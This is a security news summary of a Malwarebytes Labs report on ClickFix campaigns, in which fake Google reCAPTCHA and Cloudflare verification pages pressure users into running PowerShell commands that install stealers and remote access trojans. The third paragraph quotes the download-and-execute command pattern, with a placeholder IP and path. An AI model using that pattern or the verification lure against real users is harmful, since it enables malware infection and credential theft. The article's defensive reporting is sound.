VYPR
researchPublished Jul 2, 2026· 1 source

Fake Verification Pages Trick Users into Spreading Malware

Malwarebytes Labs reports on ClickFix campaigns using fake Google and Cloudflare verification pages to trick users into executing malicious commands, distributing multiple malware families.

Malwarebytes Labs has detailed evolving ClickFix campaigns that leverage deceptive Google and Cloudflare verification pages to manipulate victims into executing malicious commands on their own systems. These sophisticated attacks aim to install a variety of malware, including credential stealers, remote access trojans, and further payload delivery mechanisms. The campaign's infrastructure and delivery methods are constantly being refined, with attackers utilizing compromised websites and Cloudflare R2 buckets to distribute malicious payloads.

Victims are lured to fake verification pages, often impersonating legitimate services like Google reCAPTCHA or Cloudflare's human verification prompts. These pages pressure users to copy and paste PowerShell commands into their systems, under the guise of proving they are human or resolving an issue. In reality, these commands initiate the download and execution of malware. The Malwarebytes report highlights that legitimate services like Google, Cloudflare, and Microsoft would never request users to run arbitrary commands in PowerShell to verify their identity.

The technical analysis reveals a shared infrastructure across multiple campaigns, characterized by the use of specific directories like C:\ProgramData\Zooms, similar PowerShell command patterns, Cloudflare R2 buckets for payload delivery, and specific IP addresses associated with the ASN Dedik Services Limited. While these indicators can change, they provide a consistent fingerprint for identifying these ongoing operations. The final malicious command often follows a pattern like powershell -c “iex(irm ‘{IP}:{Port}/{Random Path}’ -UseBasicParsing)”.

Attackers employ various distribution methods, including repurposed older domains, Cloudflare Pages with .pages.dev subdomains, and compromised websites. Some lures impersonate Google's reCAPTCHA or display "Manual Verification Required" messages, while others use obfuscated HTML code on Cloudflare Pages to hide the malicious PowerShell commands. In some instances, the campaigns have also distributed decoys related to unauthorized Google logins, further exploiting user trust.

A notable feature observed in some ClickFix kits is an "approval gate," which allows the attacker to manually select the command the victim will execute. This adds a layer of control and customization to the attack. The variety of malware families distributed is extensive, including HijackLoader, StealC, Remus, Amatera Stealer, CastleLoader, NetSupport, and a Rust-based stealer. One observed infection chain involved a trojanized version of the Franz messaging app downloading a loader named ResiLoader, which disables security software before deploying the StealC infostealer.

To protect against these threats, users are advised to never copy and run commands from untrusted websites, be skeptical of verification pages, and keep security software updated. Unexpected technical instructions, especially those involving command-line interfaces like PowerShell, should be treated with extreme caution and verified through official channels. Malwarebytes Browser Guard is also highlighted as a tool that can warn users when a website attempts to copy content to their clipboard, a common tactic in ClickFix attacks.

The ongoing evolution of ClickFix campaigns underscores the persistent threat posed by social engineering tactics combined with technical exploitation. By impersonating trusted brands and exploiting user urgency, attackers continue to find success in tricking individuals into compromising their own systems, leading to significant data breaches and system compromises.

Synthesized by Vypr AI